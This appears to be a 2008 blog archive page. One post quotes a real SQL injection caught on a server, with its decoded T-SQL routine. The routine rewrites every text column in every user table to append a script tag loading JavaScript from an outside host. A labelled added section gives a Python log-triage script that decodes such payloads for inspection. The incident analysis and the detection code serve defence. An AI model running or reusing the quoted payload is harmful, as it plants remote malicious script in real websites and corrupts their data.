June 2008 Blog Posts

Microsoft Source Code Analyzer for SQL Injection

Community Technology Preview (June 2008)

Microsoft Source Code Analyzer for SQL Injection is a static code analysis tool for finding SQL Injection vulnerabilities in ASP code. Customers can run the tool on their ASP source code to help identify code paths that are vulnerable to SQL Injection attacks.

http://www.microsoft.com/downloads/details.aspx?FamilyID=58a7c46e-a599-4fcb-9ab4-a4334146b6ba&DisplayLang=en

Ciao Massimiliano

posted @ Thursday, June 26, 2008 3:25 PM | Feedback (10)

...SQL Injection....

Hi, for an acquaintance of mine who was hit by SQL injection (they were performing UPDATEs on a table), we noticed that they were executing operations of this kind:

SELECT * FROM xxxx where id=31786;DECLARE @S VARCHAR(4000);SET @S=CAST(... AS VARCHAR(4000));EXEC(@S);

Analyzing the string in binary form:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name,b.name FROM sysobjects a,syscolumns b
  WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.updatead.com/b.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Ciao Massimiliano

posted @ Wednesday, June 18, 2008 10:14 AM | Feedback (13)
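As an added example that is not part of the original post (and not a tool the post mentions), the following Python script triages web server logs for the request shape shown above: it finds the hex-encoded CAST(0x... AS VARCHAR) literal in the query string, decodes it, and flags the markers of the cursor-driven mass update (sysobjects, syscolumns, CURSOR, <script). The IIS/W3C field layout, the function names (decode_hex_cast, triage_line, triage_log) and the sample log lines are assumptions constructed for this example.

```python
"""Triage of IIS/W3C-style web logs for the hex-encoded T-SQL injection
pattern quoted in the post:
    DECLARE @S VARCHAR(4000);SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S);

Added example, not code from the original post. Assumptions (hypothetical):
- log lines follow the field order date time s-ip cs-method cs-uri-stem
  cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status;
- the query string is URL-encoded into a single space-free field;
- the sample lines below are constructed for this example, not real traffic.
"""
import re
from urllib.parse import unquote

# CAST(0x<hex> AS VARCHAR(...)) or CAST(0x<hex> AS NVARCHAR(...)); the N decides the encoding.
HEX_CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.IGNORECASE)

# Substrings that, once decoded, mark the "update every text column" routine from the post.
MARKERS = ("sysobjects", "syscolumns", "CURSOR", "<script")


def decode_hex_cast(query_string):
    """Return the decoded text of the first CAST(0x... AS [N]VARCHAR) literal in the
    URL-encoded query string, or None if there is none. The text is only decoded
    for inspection, never executed."""
    plain = unquote(query_string)
    m = HEX_CAST_RE.search(plain)
    if not m:
        return None
    hex_blob, n_prefix = m.group(1), m.group(2)
    if len(hex_blob) % 2:  # an odd-length hex literal cannot be a byte string
        return None
    raw = bytes.fromhex(hex_blob)
    # NVARCHAR literals carry UTF-16LE text; VARCHAR literals are single-byte.
    encoding = "utf-16-le" if n_prefix.upper() == "N" else "latin-1"
    return raw.decode(encoding, errors="replace")


def triage_line(line):
    """Return a finding dict for a suspicious log line, or None for a clean one."""
    fields = line.split()
    if len(fields) < 11:
        return None
    query = fields[5]
    plain = unquote(query)
    decoded = decode_hex_cast(query)
    # Either a decodable hex CAST or a bare DECLARE @... in the query string is enough to flag.
    if decoded is None and not re.search(r"DECLARE\s+@", plain, re.IGNORECASE):
        return None
    hits = [mk for mk in MARKERS if decoded is not None and mk.lower() in decoded.lower()]
    return {"client": fields[8], "uri": fields[4], "decoded": decoded, "markers": hits}


def triage_log(lines):
    """Run triage_line over an iterable of log lines and keep only the findings."""
    return [f for f in (triage_line(line) for line in lines) if f is not None]


# --- constructed sample data (not real traffic) -----------------------------
# The hex blob is built here from the opening of the decoded routine quoted in
# the post, so the sample line is self-contained.
SAMPLE_PAYLOAD = ("DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
                  "SELECT a.name,b.name FROM sysobjects a,syscolumns b")
SAMPLE_HEX = SAMPLE_PAYLOAD.encode("latin-1").hex().upper()
SAMPLE_QUERY = ("id=31786;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x" + SAMPLE_HEX
                + "%20AS%20VARCHAR(4000));EXEC(@S);--")
SAMPLE_LINES = [
    "2008-06-18 10:14:02 10.0.0.5 GET /product.asp " + SAMPLE_QUERY
    + " 80 - 203.0.113.7 Mozilla/4.0 200",
    "2008-06-18 10:14:05 10.0.0.5 GET /product.asp id=31786 80 - 198.51.100.3 Mozilla/4.0 200",
]

if __name__ == "__main__":
    for finding in triage_log(SAMPLE_LINES):
        print(finding["client"], finding["uri"], finding["markers"])
        print("  decoded:", finding["decoded"][:80])
```

The decoded text is only displayed, so an analyst can confirm what the injected batch would have done without running it. Once a hit like this is confirmed, the cursor's WHERE clause tells the defender where to look for damage: xtype values 99, 35, 231 and 167 in syscolumns are ntext, text, nvarchar and varchar, so every column of those types in every user table needs to be searched for the appended script tag and the application's query code fixed to use parameterized commands.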

[SW] Kaspersky Internet Security 2009: free key for 1 year and 3 PCs

For anyone who may be interested!! :-)

http://www.uploadsblog.com/2008/06/11/kaspersky-internet-security-2009-free-key-per-1-anno-e-3-pc/

Ciao Massimiliano

posted @ Wednesday, June 11, 2008 8:58 AM | Feedback (12)

The categories of PM :-)

What do you think? :-)

http://punto-informatico.it/p.aspx?id=2310667

Ciao Massimiliano

posted @ Friday, June 6, 2008 9:08 AM | Feedback (5)

Chatting helps reduce interruptions at work

"...Chatting from the workplace does not reduce productivity; on the contrary, it increases it....." But is that true? Bah...

http://www.downloadblog.it/post/6870/chattare-aiuta-a-diminuire-le-interruzioni-sul-lavoro

Ciao Massimiliano

posted @ Thursday, June 5, 2008 8:47 AM | Feedback (10)